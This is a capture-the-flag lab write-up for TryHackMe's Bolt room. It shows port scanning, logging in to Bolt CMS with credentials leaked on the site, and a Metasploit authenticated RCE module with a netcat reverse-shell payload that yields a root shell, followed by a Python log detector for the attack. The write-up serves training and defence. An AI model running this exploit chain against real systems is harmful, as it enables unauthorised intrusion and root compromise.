THM Writeup – Bolt

A hero is unleashed

Room: Bolt

Difficulty: Easy

Operating System: Linux

Author: 0x9747

This room is designed to get users familiar with Bolt CMS and how it can be exploited through an authenticated remote code execution vulnerability. Wait at least 3-4 minutes for the machine to start properly.

Add IP address to your hosts file:

echo '10.10.17.193    bolt.thm' >> /etc/hosts

Scan the target machine – find open ports first:

nmap -n -Pn -sS -p- --open --min-rate 5000 -vvv bolt.thm

PORT     STATE SERVICE  REASON
22/tcp   open  ssh      syn-ack ttl 64
80/tcp   open  http     syn-ack ttl 64
8000/tcp open  http-alt syn-ack ttl 64

Get more details about open ports:

nmap -T4 -A -p 22,80,8000 bolt.thm

22/tcp   open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 f3:85:ec:54:f2:01:b1:94:40:de:42:e8:21:97:20:80 (RSA)
|   256 77:c7:c1:ae:31:41:21:e4:93:0e:9a:dd:0b:29:e1:ff (ECDSA)
|_  256 07:05:43:46:9d:b2:3e:f0:4d:69:67:e4:91:d3:d3:7f (EdDSA)
80/tcp   open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
8000/tcp open  http    PHP 7.2.32-1
| fingerprint-strings: 
|   FourOhFourRequest: 
|     HTTP/1.0 404 Not Found
|     Date: Fri, 05 Aug 2022 06:00:11 GMT
|     Connection: close
|     X-Powered-By: PHP/7.2.32-1+ubuntu18.04.1+deb.sury.org+1
|     Cache-Control: private, must-revalidate
|     Date: Fri, 05 Aug 2022 06:00:11 GMT
|     Content-Type: text/html; charset=UTF-8
|     pragma: no-cache
|     expires: -1
|     X-Debug-Token: a2cab2
|     <!doctype html>
|     <html lang="en">
|     <head>
|     <meta charset="utf-8">
|     <meta name="viewport" content="width=device-width, initial-scale=1.0">
|     <title>Bolt | A hero is unleashed</title>
|     <link href="https://fonts.googleapis.com/css?family=Bitter|Roboto:400,400i,700" rel="stylesheet">
|     <link rel="stylesheet" href="/theme/base-2018/css/bulma.css?8ca0842ebb">
|     <link rel="stylesheet" href="/theme/base-2018/css/theme.css?6cb66bfe9f">
|     <meta name="generator" content="Bolt">
|     </head>
|     <body>
|     href="#main-content" class="vis
|   GetRequest: 
|     HTTP/1.0 200 OK
|     Date: Fri, 05 Aug 2022 06:00:11 GMT
|     Connection: close
|     X-Powered-By: PHP/7.2.32-1+ubuntu18.04.1+deb.sury.org+1
|     Cache-Control: public, s-maxage=600
|     Date: Fri, 05 Aug 2022 06:00:11 GMT
|     Content-Type: text/html; charset=UTF-8
|     X-Debug-Token: 069ac2
|     <!doctype html>
|     <html lang="en-GB">
|     <head>
|     <meta charset="utf-8">
|     <meta name="viewport" content="width=device-width, initial-scale=1.0">
|     <title>Bolt | A hero is unleashed</title>
|     <link href="https://fonts.googleapis.com/css?family=Bitter|Roboto:400,400i,700" rel="stylesheet">
|     <link rel="stylesheet" href="/theme/base-2018/css/bulma.css?8ca0842ebb">
|     <link rel="stylesheet" href="/theme/base-2018/css/theme.css?6cb66bfe9f">
|     <meta name="generator" content="Bolt">
|     <link rel="canonical" href="http://0.0.0.0:8000/">
|     </head>
|_    <body class="front">
|_http-generator: Bolt
|_http-title: Bolt | A hero is unleashed

We have 3 ports open: 22 (SSH – Secure Shell), 80 (HTTP – Apache default page), 8000 (HTTP – Bolt CMS).

Check the application on port 8000 – browse to http://bolt.thm:8000/

Bolt CMS

Scrolling down a little, we find a post from Jake containing his password:

Jake's message for IT Department

Scrolling down a little further, we find another message from Jake revealing his username:

Jake's message for everyone

Let's find the login page now – google "bolt cms login page":

bolt cms login page search results

By clicking the Bolt Documentation link we find out that the login page is at http://mydomain.com/bolt

Bolt CMS documentation login page

So browse to http://bolt.thm:8000/bolt – and we are at the login page:

Bolt CMS login page

Log in to the CMS with the username and password we found earlier:

Bolt CMS Dashboard

At the bottom left of the dashboard we see the CMS version.

Now browse to https://www.exploit-db.com/ and search for bolt cms:

exploit database bolt cms search results

Click the Authenticated Remote Code Execution exploit and find the EDB-ID:

Bolt CMS - Authentication RCE

Another way to find the EDB-ID is searchsploit:

root@attackbox:~# searchsploit bolt

---------------------------------------------- ---------------------------------
 Exploit Title                                |  Path
---------------------------------------------- ---------------------------------
Apple WebKit - 'JSC::SymbolTableEntry::isWatc | multiple/dos/41869.html
Bolt CMS 3.6.10 - Cross-Site Request Forgery  | php/webapps/47501.txt
Bolt CMS 3.6.4 - Cross-Site Scripting         | php/webapps/46495.txt
Bolt CMS 3.6.6 - Cross-Site Request Forgery / | php/webapps/46664.html
Bolt CMS 3.7.0 - Authenticated Remote Code Ex | php/webapps/[REDACTED].py
Bolt CMS < 3.6.2 - Cross-Site Scripting       | php/webapps/46014.txt
Bolthole Filter 2.6.1 - Address Parsing Buffe | multiple/remote/24982.txt
BoltWire 3.4.16 - 'index.php' Multiple Cross- | php/webapps/36552.txt
BoltWire 6.03 - Local File Inclusion          | php/webapps/48411.txt
Cannonbolt Portfolio Manager 1.0 - Multiple V | php/webapps/21132.txt
CMS Bolt - Arbitrary File Upload (Metasploit) | php/remote/38196.rb
---------------------------------------------- ---------------------------------

As you can see, the exploit filename is the EDB-ID.

Run metasploit:

msfconsole

Search for the bolt exploits:

msf5 > search bolt

Matching Modules
================

   #  Name                                        Disclosure Date  Rank       Check  Description
   -  ----                                        ---------------  ----       -----  -----------
   0  exploit/multi/http/bolt_file_upload         2015-08-17       excellent  Yes    CMS Bolt File Upload Vulnerability
   1  exploit/unix/webapp/[REDACTED]  2020-05-07       excellent  Yes    Bolt CMS 3.7.0 - Authenticated Remote Code Execution

Now we have the full module path for the Authenticated Remote Code Execution exploit.

Select (use) the Authenticated Remote Code Execution exploit and set LHOST, RHOST, USERNAME, PASSWORD:

msf5 > use 1
[*] Using configured payload cmd/unix/reverse_netcat
msf5 exploit(unix/webapp/[REDACTED]) > show options

Module options (exploit/unix/webapp/[REDACTED]):

   Name                 Current Setting        Required  Description
   ----                 ---------------        --------  -----------
   FILE_TRAVERSAL_PATH  ../../../public/files  yes       Traversal path from "/files" on the web server to "/root" on the server
   PASSWORD                                    yes       Password to authenticate with
   Proxies                                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                                      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT                8000                   yes       The target port (TCP)
   SRVHOST              0.0.0.0                yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
   SRVPORT              8080                   yes       The local port to listen on.
   SSL                  false                  no        Negotiate SSL/TLS for outgoing connections
   SSLCert                                     no        Path to a custom SSL certificate (default is randomly generated)
   TARGETURI            /                      yes       Base path to Bolt CMS
   URIPATH                                     no        The URI to use for this exploit (default is random)
   USERNAME                                    yes       Username to authenticate with
   VHOST                                       no        HTTP server virtual host


Payload options (cmd/unix/reverse_netcat):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   2   Linux (cmd)


msf5 exploit(unix/webapp/[REDACTED]) > set LHOST 10.10.167.139
LHOST => 10.10.167.139
msf5 exploit(unix/webapp/[REDACTED]) > set RHOST bolt.thm
RHOST => bolt.thm
msf5 exploit(unix/webapp/[REDACTED]) > set USERNAME [REDACTED]
USERNAME => [REDACTED]
msf5 exploit(unix/webapp/[REDACTED]) > set PASSWORD [REDACTED]
PASSWORD => [REDACTED]

LHOST is the IP address of your attacking machine.

Now run the exploit and find the flag:

msf5 exploit(unix/webapp/[REDACTED]) > run

[*] Started reverse TCP handler on 10.10.167.139:4444 
[*] Executing automatic check (disable AutoCheck to override)
[+] The target is vulnerable. Successfully changed the /bolt/profile username to PHP $_GET variable "rllcy".
[*] Found 2 potential token(s) for creating .php files.
[+] Deleted file qwcfhipmyai.php.
[+] Used token a741faa0358fbf956f4560578f to create hdfscjytaf.php.
[*] Attempting to execute the payload via "/files/hdfscjytaf.php?rllcy=`payload`"
[*] Command shell session 1 opened (10.10.167.139:4444 -> 10.10.68.75:46752) at 2022-08-05 08:19:33 +0100
[!] No response, may have executed a blocking payload!
[+] Deleted file hdfscjytaf.php.
[+] Reverted user profile back to original state.

id
uid=0(root) gid=0(root) groups=0(root)
pwd
/home/bolt/public/files
cd /home
ls
bolt
composer-setup.php
flag.txt
cat flag.txt
THM{[REDACTED]}
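As a defensive counterpart to the module output above, here is an added example (not part of this writeup or of the Metasploit module) that scans Apache-style access logs for the two stages the module reports: a POST to /bolt/profile that rewrites the username into a PHP $_GET variable, followed by GET requests to a freshly created .php file under /files/ that carries that variable. The log lines, client IPs and the query value CMD are constructed placeholders.

```python
# Added example for this writeup (not from the room or the Metasploit module):
# flag the Bolt CMS 3.7.0 authenticated RCE pattern in Apache-style access logs.
# Stage 1: a POST to /bolt/profile (the module rewrites the profile username into
#          a PHP $_GET variable). Stage 2: GET requests to a new .php file under
#          /files/ carrying that variable as the query parameter.
# All log lines, IPs and the query value "CMD" below are constructed placeholders.
import re

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)
# A PHP file directly under /files/, with or without a query string: Bolt's
# upload directory should serve static assets only, never executable code.
PHP_UNDER_FILES = re.compile(r'^/files/[^/?]+\.php(?:\?.*)?$')

SAMPLE_LOG = [  # constructed sample, combined log format
    '10.0.0.5 - - [05/Aug/2022:08:19:30 +0100] "GET /bolt/profile HTTP/1.1" 200 5120 "-" "Mozilla"',
    '10.0.0.5 - - [05/Aug/2022:08:19:31 +0100] "POST /bolt/profile HTTP/1.1" 302 0 "-" "Mozilla"',
    '10.0.0.5 - - [05/Aug/2022:08:19:32 +0100] "GET /files/hdfscjytaf.php?rllcy=CMD HTTP/1.1" 200 0 "-" "Mozilla"',
    '10.0.0.9 - - [05/Aug/2022:08:20:00 +0100] "GET /files/brochure.pdf HTTP/1.1" 200 88112 "-" "Mozilla"',
    '10.0.0.9 - - [05/Aug/2022:08:20:05 +0100] "GET /files/old.php HTTP/1.1" 404 0 "-" "Mozilla"',
]

def parse_line(line):
    """Return the fields of one access-log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None

def find_bolt_rce(lines):
    """Return (ip, path) for every PHP hit under /files/ made by a client that
    earlier POSTed to /bolt/profile; order follows the log."""
    profile_posters = set()
    hits = []
    for rec in filter(None, map(parse_line, lines)):
        if rec["method"] == "POST" and rec["path"].startswith("/bolt/profile"):
            profile_posters.add(rec["ip"])
        elif PHP_UNDER_FILES.match(rec["path"]) and rec["ip"] in profile_posters:
            hits.append((rec["ip"], rec["path"]))
    return hits

def stray_php_under_files(lines):
    """Weaker, stateless signal for IR triage: any .php path under /files/ at all.
    The module deletes its files afterwards, so the log may be the only trace."""
    return sorted({rec["path"].split("?")[0] for rec in filter(None, map(parse_line, lines))
                   if PHP_UNDER_FILES.match(rec["path"])})

if __name__ == "__main__":
    for ip, path in find_bolt_rce(SAMPLE_LOG):
        print(f"possible Bolt RCE from {ip}: {path}")
```

Note that the module's cleanup (deleting the .php file and reverting the profile) leaves no artefact on disk, so the access log and the profile-change history are the durable evidence to look for.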
